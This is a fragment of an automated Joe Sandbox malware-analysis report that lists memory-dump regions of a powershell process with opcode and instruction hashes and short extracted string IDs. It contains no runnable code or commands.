                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f10000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3925527311440488e4b25d92f6a07581a9f7c1952bb0dc6d380c9acfd450f9c8
                                                                                                                    • Instruction ID: 262a5f51c0e75fc84b2253e4dba61dfa7aa0843fb934c05598922eba227b7f7f
                                                                                                                    • Opcode Fuzzy Hash: 3925527311440488e4b25d92f6a07581a9f7c1952bb0dc6d380c9acfd450f9c8
                                                                                                                    • Instruction Fuzzy Hash: 7A014734D083854FCB12D738D84458EBFB4EF43220B4241ABD089CB5A2C728580AC7B2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2176997039.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_87d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bb63225710bf8e813dd7fbe438e2e28cde554f2b8edf68a25522ac3da0f6eb1
                                                                                                                    • Instruction ID: c44d493fd1865cf0f522b68a63c7276d5c0351df0fe0100bf466f521f7d8ba38
                                                                                                                    • Opcode Fuzzy Hash: 5bb63225710bf8e813dd7fbe438e2e28cde554f2b8edf68a25522ac3da0f6eb1
                                                                                                                    • Instruction Fuzzy Hash: 5F01A771405B449AE7208A25DD84B67BFE8FF51324F18C419ED4D9A14AC279D845C6B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f9dce9fe7a822c2415744d7f8070afbaed69b7db9e903875d333b7145712bd54
                                                                                                                    • Instruction ID: 0e9cbd8dc64c822fe474d96497334a1a8e506d5f7635b716be3e2c7d890f8f9d
                                                                                                                    • Opcode Fuzzy Hash: f9dce9fe7a822c2415744d7f8070afbaed69b7db9e903875d333b7145712bd54
                                                                                                                    • Instruction Fuzzy Hash: CCF0C8B57015195FC7566B38F41943D3BA7EFC9721318405EE806C77A6DF389C028796
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191438502.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f10000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 438723171e597701078fb4268cee3338ed44602f437d9a62ede74fb325224051
                                                                                                                    • Instruction ID: 169c8882b60fff08cd7ed7ed553fddb48d2e2f3bb65823a2be2c46de7b3b6c05
                                                                                                                    • Opcode Fuzzy Hash: 438723171e597701078fb4268cee3338ed44602f437d9a62ede74fb325224051
                                                                                                                    • Instruction Fuzzy Hash: 40F0C230E092864FCB029768D8405DD7B71EF82251F5540A7D444DB297DA285C0A8B61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e14b7f608890c09709196901ede0d3a9b4ffd6de4b68dba2942461d6adb54459
                                                                                                                    • Instruction ID: 56cb85174ef10a891b3545ed2c782b73dc9b723ab6b4455c9c9aa374da30f9fb
                                                                                                                    • Opcode Fuzzy Hash: e14b7f608890c09709196901ede0d3a9b4ffd6de4b68dba2942461d6adb54459
                                                                                                                    • Instruction Fuzzy Hash: 5FF06DB93005188F86896B38A45943E3BA7EFC97223184019E806CB759DF389C028791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2176997039.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_87d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d61ee9cbc4f7a404008a5ef42ef9d03349f4e1a1d2ce9834ff23f0550a22aa06
                                                                                                                    • Instruction ID: f0ec2de8c022c4caa9c765b73e4c5eb4f0dce6d18d3c2bad65c7706f8bfe1bd0
                                                                                                                    • Opcode Fuzzy Hash: d61ee9cbc4f7a404008a5ef42ef9d03349f4e1a1d2ce9834ff23f0550a22aa06
                                                                                                                    • Instruction Fuzzy Hash: 7FF0C272405744AEE7208E16CCC4B62FFE8EF51334F18C45AED4C5E28AC2799C45CAB0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bd1594133ebbef25a6c531b11ce6eeda7af51a691478a95d375045069eeeb070
                                                                                                                    • Instruction ID: a4e71605881d1aaaff9f22832daeca322bb802dc9bf1a47ea3b279f4671cbcbf
                                                                                                                    • Opcode Fuzzy Hash: bd1594133ebbef25a6c531b11ce6eeda7af51a691478a95d375045069eeeb070
                                                                                                                    • Instruction Fuzzy Hash: DAF09035A043458FC706CB58D8A16A8F7B0FF4932871182E7C4189B1E2C7329C16CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191438502.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f10000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b6abe9474e9075b8430d12a3754331a94e2e594dff6a7b872567adbac2791c1b
                                                                                                                    • Instruction ID: dee7674f6f1ae8297a4d14d50412e8f6477459cc9d4ea80e28388a146db4dc47
                                                                                                                    • Opcode Fuzzy Hash: b6abe9474e9075b8430d12a3754331a94e2e594dff6a7b872567adbac2791c1b
                                                                                                                    • Instruction Fuzzy Hash: E7F0F931A00109AFCB15DFD8D9408ADFB77FF88320B648119E514A32A4C732AD22CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 33f653d6a6e7d90a3960ea17a1b004baf570c8b37be19166742c67cb902770d1
                                                                                                                    • Instruction ID: f8ffdfe459cf40611dd33b6d6e27aeacb8a7ac829e798f162611ec786798c738
                                                                                                                    • Opcode Fuzzy Hash: 33f653d6a6e7d90a3960ea17a1b004baf570c8b37be19166742c67cb902770d1
                                                                                                                    • Instruction Fuzzy Hash: 51E01275D042489FC740DF789842569FFF0AB15210B1485EEC559DB211E6319A42CFD1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                    • Instruction ID: 0b0ab4253ee133f3994730a17407743108318671c55e0781c61d8371e32140a5
                                                                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                    • Instruction Fuzzy Hash: B4D067B0D042099F8790EFADD94156EFBF4EB59200F6085AE891DE7341EB329A12CFD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$84zl$84zl$84zl$84zl$tPlq$tPlq$tPlq$tPlq$$lq$(rq$(rq$(rq$(rq
                                                                                                                    • API String ID: 0-2802174530
                                                                                                                    • Opcode ID: b4595013ca2b300d8b1b8f72c7d3e1f63067cf49ff3e1e41519b8e53c71f7ee5
                                                                                                                    • Instruction ID: 784556705f0b781547010f9e3afd5201030f61e3d3de7c40e698163c6405b009
                                                                                                                    • Opcode Fuzzy Hash: b4595013ca2b300d8b1b8f72c7d3e1f63067cf49ff3e1e41519b8e53c71f7ee5
                                                                                                                    • Instruction Fuzzy Hash: 02A1E9B67501069FCB19CF98C9507BAB7A7AB99710F24845DE8019B2D8CB31DD43C7A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$4'lq$tLnk$tLnk$x.mk$-mk
                                                                                                                    • API String ID: 0-2665676764
                                                                                                                    • Opcode ID: cfc043bd55a4b8df511578593aaf72d7f64585070607ab17f76f4f6369ac3274
                                                                                                                    • Instruction ID: 795a4b698061f62e92ee6cf7ec31d8cf25016095b849d401eab2adb7fb444013
                                                                                                                    • Opcode Fuzzy Hash: cfc043bd55a4b8df511578593aaf72d7f64585070607ab17f76f4f6369ac3274
                                                                                                                    • Instruction Fuzzy Hash: 6F226EF4A002159FDB24DF68C951BEEBBB2FB94304F108599D8096B385CB35AE85CF91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$84zl$84zl$d%rq$d%rq$d%rq$d%rq$tPlq$tPlq$$lq
                                                                                                                    • API String ID: 0-3083483887
                                                                                                                    • Opcode ID: 905885a9089bf280145e20f9ab8b57534ef1440a2612d9f59c234242125de087
                                                                                                                    • Instruction ID: 7a10ab5c834969dca421d08f5be904d0727b376747a839fd87198038774d69d3
                                                                                                                    • Opcode Fuzzy Hash: 905885a9089bf280145e20f9ab8b57534ef1440a2612d9f59c234242125de087
                                                                                                                    • Instruction Fuzzy Hash: 8271F6B67002069FDB19DEA9C510A7ABBA7EB98310F24855DD901DF2D4DB31DC42C7A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$tPlq$tPlq$#lk$$lq$$lq$$lq$rl$rl
                                                                                                                    • API String ID: 0-2257079706
                                                                                                                    • Opcode ID: 96d1310cf9196649015fd6318f6e8650450e76be063866c5096c739532a5f901
                                                                                                                    • Instruction ID: 902a60e1409f40452c34afa1af79432e2aac61fe9cda7a05684a70c15d1a67e1
                                                                                                                    • Opcode Fuzzy Hash: 96d1310cf9196649015fd6318f6e8650450e76be063866c5096c739532a5f901
                                                                                                                    • Instruction Fuzzy Hash: 68A147B2304356DFC726CAB98C1077ABBA6EFDA610B1980AFD445CB2D1DB31D941C7A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 84zl$84zl$84zl$84zl$tPlq$tPlq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-117924011
                                                                                                                    • Opcode ID: 38cc165972184255586059429a0ce8f66672793647815bc789468e7a4a4a49f5
                                                                                                                    • Instruction ID: 5637868a4c962c8f42e00925b4a35cd716ba319000d0205c01d6564c11777c46
                                                                                                                    • Opcode Fuzzy Hash: 38cc165972184255586059429a0ce8f66672793647815bc789468e7a4a4a49f5
                                                                                                                    • Instruction Fuzzy Hash: 7FF108B5B04215EFCB149E79C8107AABBB2EF84311F24C46EE9059B3A4DB39DD41C7A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 84zl$84zl$84zl$84zl$tPlq$tPlq$tPlq$tPlq
                                                                                                                    • API String ID: 0-4075537406
                                                                                                                    • Opcode ID: 534fbc177be67c89861c6741b3ffe2eb26a9dca25f69cf2f53273e5c68a35ad0
                                                                                                                    • Instruction ID: e7222b0e4dd2bb5975737c35ab71a540b57e5c0b1f5cbf29021be166075976e1
                                                                                                                    • Opcode Fuzzy Hash: 534fbc177be67c89861c6741b3ffe2eb26a9dca25f69cf2f53273e5c68a35ad0
                                                                                                                    • Instruction Fuzzy Hash: ABC10475B00229DFCB14CF69C440AAABBE2FF98311F248569E8159B394CB71EC51CBE5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 84zl$84zl$84zl$84zl$tPlq$tPlq$tPlq$tPlq
                                                                                                                    • API String ID: 0-4075537406
                                                                                                                    • Opcode ID: a73ffab12f2672339d28ee910892846685c0647164daceb731251631342e955b
                                                                                                                    • Instruction ID: e86bed917395733038cceb3247cd15d9b0920fdee6138a35fc0b2cee7249c887
                                                                                                                    • Opcode Fuzzy Hash: a73ffab12f2672339d28ee910892846685c0647164daceb731251631342e955b
                                                                                                                    • Instruction Fuzzy Hash: 1D91D275B00125DFCB24DF68C950AAAFBE2FBC8311B24855EE8169B394DB31ED42C791
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tPlq$tPlq$$lq$$lq$$lq$$lq$rl$rl
                                                                                                                    • API String ID: 0-2283738031
                                                                                                                    • Opcode ID: 72762edf9c8b0594e69596d7c8ce9e7145a743cfd29e12f60428d74e0a57ddf3
                                                                                                                    • Instruction ID: b5d3f9ded5547d0a9fdb263a39cdd585749088333b1e291ef344172f725c3b65
                                                                                                                    • Opcode Fuzzy Hash: 72762edf9c8b0594e69596d7c8ce9e7145a743cfd29e12f60428d74e0a57ddf3
                                                                                                                    • Instruction Fuzzy Hash: 59513AF1784349ABDB25CAA98800767BBB6AB92710F18C46FE506CB2D2DB71C841D791
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 84zl$84zl$XRqq$XRqq$XRqq$tPlq$tPlq$$lq
                                                                                                                    • API String ID: 0-431398978
                                                                                                                    • Opcode ID: 4430715e8faaceef83c0f991e88bff4aaab00067ad8d0415765cd211986e14f0
                                                                                                                    • Instruction ID: f814bb22a9d0ab0c3e3667f89d882e9617b32109c20524c2c29aa6c9437f09cf
                                                                                                                    • Opcode Fuzzy Hash: 4430715e8faaceef83c0f991e88bff4aaab00067ad8d0415765cd211986e14f0
                                                                                                                    • Instruction Fuzzy Hash: AD61E336B04525DFCB149E798540AAABBF2ABC9312F24C16DE4059B2A5CF31DC41CBA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $lq$$lq$$lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-1854859054
                                                                                                                    • Opcode ID: d8749f28f202bec6b019cd209d8d95aa21393da1c4994e34bb4ff11db09cb205
                                                                                                                    • Instruction ID: 26af554f810c3f39b314d7447fc6a99acf1cc5ab8a3dd78582cc7b500e92005f
                                                                                                                    • Opcode Fuzzy Hash: d8749f28f202bec6b019cd209d8d95aa21393da1c4994e34bb4ff11db09cb205
                                                                                                                    • Instruction Fuzzy Hash: 0041B6F170D3468FCB36CEA9984226BFBB2EB95610B15807FD446CB286DB31D845C792
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$84zl$d%rq$d%rq$d%rq$tPlq
                                                                                                                    • API String ID: 0-3386221057
                                                                                                                    • Opcode ID: 6c744bbbd9d059b66c20a3bde7246ba9b49ff026728c9632e730e2a79cceeb56
                                                                                                                    • Instruction ID: cace4ef74db6774b42aa45a49a8de3402db68c7ad889cb7c81854a685e52250e
                                                                                                                    • Opcode Fuzzy Hash: 6c744bbbd9d059b66c20a3bde7246ba9b49ff026728c9632e730e2a79cceeb56
                                                                                                                    • Instruction Fuzzy Hash: 0A31B3B5B00205AFC718CF94C550A6ABBB7EB98714F25C159E805AF384C731DC42CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 84zl$84zl$tPlq$tPlq$$lq
                                                                                                                    • API String ID: 0-1606296645
                                                                                                                    • Opcode ID: 17eeb1c900c009c6298e6e6448930d7c9e456cfeebfe9479bb3a70874e1dfcff
                                                                                                                    • Instruction ID: 011eb29aeac3a33cc104b1ffc4a60f4cdd4aac966056f50afdb552bd26454072
                                                                                                                    • Opcode Fuzzy Hash: 17eeb1c900c009c6298e6e6448930d7c9e456cfeebfe9479bb3a70874e1dfcff
                                                                                                                    • Instruction Fuzzy Hash: 8A61B336B04615DFDB14DFB88940A6AFBA2ABC5312F24C06AE4159B395CF31DD42CBA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-2560084307
                                                                                                                    • Opcode ID: 1de50dac900975111010d46c60c88b71f6cdbb319b3db08f777d98bf9d8671ba
                                                                                                                    • Instruction ID: 8aef690a5836fb7e59049cb363c68d72962d096401a46ae80d63844cec4d6910
                                                                                                                    • Opcode Fuzzy Hash: 1de50dac900975111010d46c60c88b71f6cdbb319b3db08f777d98bf9d8671ba
                                                                                                                    • Instruction Fuzzy Hash: 8C51F6B1B0424ADFCF69CFA9C5052AAB7A2FF91310F14C06EE8058B2D4DB31D949CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-2560084307
                                                                                                                    • Opcode ID: 96a090adf158a9706d95570f754524cb5ad42dadfb7b711c470534d1ce43151e
                                                                                                                    • Instruction ID: c67759ff599aff0e74519a58760f1653b2172c79cf3e5b9ea3c6dcc9ff6e5d95
                                                                                                                    • Opcode Fuzzy Hash: 96a090adf158a9706d95570f754524cb5ad42dadfb7b711c470534d1ce43151e
                                                                                                                    • Instruction Fuzzy Hash: EE4114B1714316DFCB169EB4CC106BA7BB2AFD6200F14806EE905CB2D1DB31C956C7A2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-2560084307
                                                                                                                    • Opcode ID: a333b262a4598d152af90ad1cf7769069836b8c0e1874920af74bed735836676
                                                                                                                    • Instruction ID: d2464682e734269b3f3fd1e5a1190e24b694bbf35a58adde4463b5326acb800a
                                                                                                                    • Opcode Fuzzy Hash: a333b262a4598d152af90ad1cf7769069836b8c0e1874920af74bed735836676
                                                                                                                    • Instruction Fuzzy Hash: BC412DB170030BDFDB2ACEAA854217AB7A3EFA1210B74816FD8118B1D5DB35E561C762
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-2560084307
                                                                                                                    • Opcode ID: f895d58b681248f9f989876f53f67292e2979dabe60a50ce2b0a9a4d1d5a8bc2
                                                                                                                    • Instruction ID: ebd151415047e208cdbc7417882c9f4ddae25e7d25f5f3189bdd134a961041d7
                                                                                                                    • Opcode Fuzzy Hash: f895d58b681248f9f989876f53f67292e2979dabe60a50ce2b0a9a4d1d5a8bc2
                                                                                                                    • Instruction Fuzzy Hash: B93125B37042578FCB26CEE88440276B7BBAFA5210B2580AED702C62D5DB35C657C761
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: tPlq$$lq$$lq$$lq$$lq
                                                                                                                    • API String ID: 0-2410456559
                                                                                                                    • Opcode ID: 406eb329de9857f0f978172908e52032e69d52bcb51c25b343956ec3650e74aa
                                                                                                                    • Instruction ID: f512826ce237f8697af47c1a3efbf7cb7f1a5f981637585e987096851ff84223
                                                                                                                    • Opcode Fuzzy Hash: 406eb329de9857f0f978172908e52032e69d52bcb51c25b343956ec3650e74aa
                                                                                                                    • Instruction Fuzzy Hash: A7210876A00228DFCB318E74C54097ABBB5EF80752B1D816EEC009B351D771F980CBA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 4'lq$4'lq$4'lq$$lq$$lq
                                                                                                                    • API String ID: 0-1004931760
                                                                                                                    • Opcode ID: cd6277ff46fab6a99123c3be1dc4456c14be42a8ad4bb4ce0fe20dd5083b0a09
                                                                                                                    • Instruction ID: b1a5c10a47b1127fabfbd66e561cd4c3fcef3a0ebf702d5e64590ec51e99b2f9
                                                                                                                    • Opcode Fuzzy Hash: cd6277ff46fab6a99123c3be1dc4456c14be42a8ad4bb4ce0fe20dd5083b0a09
                                                                                                                    • Instruction Fuzzy Hash: 80112EA174D396CFC7278AAC5D202269FB29FA7950B2A40DFC581CB2D7CB658C05C397
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (olq$(olq$(olq$(olq
                                                                                                                    • API String ID: 0-2997052201
                                                                                                                    • Opcode ID: c9905bcfdfae9833ff9c1136374305f931d09444612cfcc6e796e40b35705553
                                                                                                                    • Instruction ID: 6928cdff7ab733090cec289a522e92cc2369bf1fe6ccc887cd918764213eeffa
                                                                                                                    • Opcode Fuzzy Hash: c9905bcfdfae9833ff9c1136374305f931d09444612cfcc6e796e40b35705553
                                                                                                                    • Instruction Fuzzy Hash: AEF125B170434ADFDB16CFA8C844BBABBA6EF91310F14846EE4058B2D1DB35D949CB61
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (f|l$(f|l$(f|l$(f|l
                                                                                                                    • API String ID: 0-3183420161
                                                                                                                    • Opcode ID: ca30157091096f7a61e707e6cfe7e4b41168c7d0d22f73efd0b882b6242e8c31
                                                                                                                    • Instruction ID: 7890c001f0b56cfc6317383e2724673b9f0db6c69c191607d979570a2c3d11d3
                                                                                                                    • Opcode Fuzzy Hash: ca30157091096f7a61e707e6cfe7e4b41168c7d0d22f73efd0b882b6242e8c31
                                                                                                                    • Instruction Fuzzy Hash: 2FC18EB5E00225DFD714CFA4C550AAEBBB2FF88311F248169D815AB754DB31ED82CB92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
